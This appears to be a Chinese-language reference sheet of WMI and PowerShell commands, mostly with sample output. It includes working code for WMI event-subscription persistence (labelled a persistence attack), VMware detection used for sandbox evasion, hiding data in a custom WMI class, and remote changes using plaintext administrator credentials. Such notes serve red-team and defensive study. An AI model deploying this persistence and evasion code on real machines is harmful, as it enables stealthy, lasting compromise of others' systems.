wmic
创建进程
C:\Users\kkkk>wmic process call create calc.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 3204;
ReturnValue = 0;
};
创建注册表键
C:\Windows\system32>wmic path stdregprov call CreateKey ^&H80000001,"Software\test"
Executing (stdregprov)->CreateKey()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
};
修改注册表键值
C:\Windows\system32>wmic path stdregprov call SetStringValue ^&H80000001,"Software\test","n","v"
Executing (stdregprov)->SetStringValue()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
};
远程删除环境变量 在本地的基础上加上 /node:192.168.58.146 /user:administrator /password:123456,例如:
wmic /node:192.168.58.146 /user:administrator /password:123456 ENVIRONMENT where "name='test'" delete
远程添加环境变量
wmic /node:192.168.58.146 /user:administrator /password:123456 ENVIRONMENT create name="test",VariableValue="tttttt"
计划任务
wmic job call create "C:\Windows\system32\defrag.exe",1,1,FALSE,TRUE,"********000000.000000-500"
powershell
启用ps1脚本执行
set-executionpolicy remotesigned
创建进程
Invoke-WmiMethod -Path win32_process -Name create -ArgumentList calc.exe
环境变量
Set-WmiInstance -Class win32_environment -Argument @{Name="testvar";VariableValue="testvalue";UserName="<SYSTEM>"}
文件重命名
Invoke-WmiMethod -Path "CIM_DataFile.Name='C:\1.test'" -Name Rename -ArgumentList "C:\2.test"
查询服务
Get-WmiObject -Query "select * from win32_service where name='ZhuDongFangYu'" | Format-List -Property PSComputerName, Name, ExitCode, Name, ProcessID, StartMode, State, Status
利用wmi类属性保存恶意数据
$StaticClass=New-Object Management.ManagementClass(‘root\cimv2’,$null,$null)
$StaticClass.Name =’Win32_EvilClass’
$StaticClass.Put()
$StaticClass.Properties.Add(‘EvilProperty’,”This is not the malware you’re looking for”)
$StaticClass.Put()
脚本驻留攻击
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\calc.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
检测虚拟机
$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True }
添加vbs provider
# PowerShell 2.0+
# Description: Powershell script to add Event Consumer
# Original Template (Eventlog Consumer) attributed to @mattifestation: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a
# Set Variables
$Name = 'StagingLocation_Example'
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA "CIM_DataFile" AND TargetInstance.Drive = "C:" AND TargetInstance.Path = "\\Windows\\VSS\\"'
$EventNamespace = 'root/cimv2'
$Class = 'ActiveScriptEventConsumer'
# Define the signature - i.e. __EventFilter
$EventFilterArgs = @{
EventNamespace = $EventNamespace
Name = $Name
Query = $Query
QueryLanguage = 'WQL'
}
$InstanceArgs = @{
Namespace = 'root/subscription'
Class = '__EventFilter'
Arguments = $EventFilterArgs
}
$Filter = Set-WmiInstance @InstanceArgs
# Define the Event Consumer - ACTION
$EventConsumerArgs = @{
Name = $Name
ScriptingEngine = 'VBScript'
ScriptText = '
Option Explicit
Dim strDate,strTime,strWmiPath,strWmiResultsPath,strFilePath,strFileTarget,strComputerName
Dim objWmiResultsFile,objFilePath,objSysInfo
Dim objFSO,dateTime
Set dateTime = CreateObject("WbemScripting.SWbemDateTime")
dateTime.SetVarDate (now())
strDate = YEAR(dateTime.GetVarDate (false)) & "-" & Right(String(2,"0") & Month(dateTime.GetVarDate (false)), 2) & "-" & Right(String(2, "0") & DAY(dateTime.GetVarDate (false)), 2)
strTime = FormatDateTime(dateTime.GetVarDate (false),vbShortTime)
Set objSysInfo = CreateObject("WinNTSystemInfo")
strComputerName = objSysInfo.ComputerName
strWMIPath = "<ADD PATH with trailing \ >"
strWmiResultsPath = strWMIPath & "results.log"
strFilePath = TargetEvent.TargetInstance.Name
Set objFSO = CreateObject("Scripting.Filesystemobject")
Set objWmiResultsFile = objFSO.OpenTextFile(strWmiResultsPath,8,True,0)
objWmiResultsFile.WriteLine strDate & "T" & strTime & "Z|" & strComputerName & "|Staging Location activity|"& strFilePath
objWmiResultsFile.Close
Set objFilePath = objFSO.GetFile(strFilePath)
strFileTarget = strWmiPath & strDate & "\" & objFSO.GetFileName(objFilePath)
If(Not objFSO.FolderExists(strWmiPath & strDate)) Then
objFSO.CreateFolder(strWmiPath & strDate)
End If
objFSO.CopyFile strFilePath, strFileTarget
'
}
$InstanceArgs = @{
Namespace = 'root/subscription'
Class = $Class
Arguments = $EventConsumerArgs
}
$Consumer = Set-WmiInstance @InstanceArgs
$FilterConsumerBingingArgs = @{
Filter = $Filter
Consumer = $Consumer
}
$InstanceArgs = @{
Namespace = 'root/subscription'
Class = '__FilterToConsumerBinding'
Arguments = $FilterConsumerBingingArgs
}
# Register the alert
$Binding = Set-WmiInstance @InstanceArgs
高级用法
查询NameSpace
Get-WmiObject -Namespace root -Class __NAMESPACE
查询Namespace 下的类
Get-WmiObject -Namespace "root/default" -List
Get-WmiObject -Class __Namespace | ForEach-Object {
$ns = '{0}\{1}' -f $_.__NAMESPACE,$_.Name
Get-WmiObject -Namespace $ns -List | ForEach-Object {
$_.Path.Path
} | Sort-Object -Unique
}
查询wmi中的类
Get-CimClass -ClassName win32_ser* SELECT * FROM Meta_Class WHERE __Class LIKE “Win32%”
查询某一个类的属性和方法
Get-CimInstance -ClassName win32_service | Get-Member -MemberType <Method | Property>
删除某一个事件
Get-WmiObject -Class __EventFilter -NameSpace "root\subscription" -Filter "__Path like '%bot%'" | Remove-WMiObject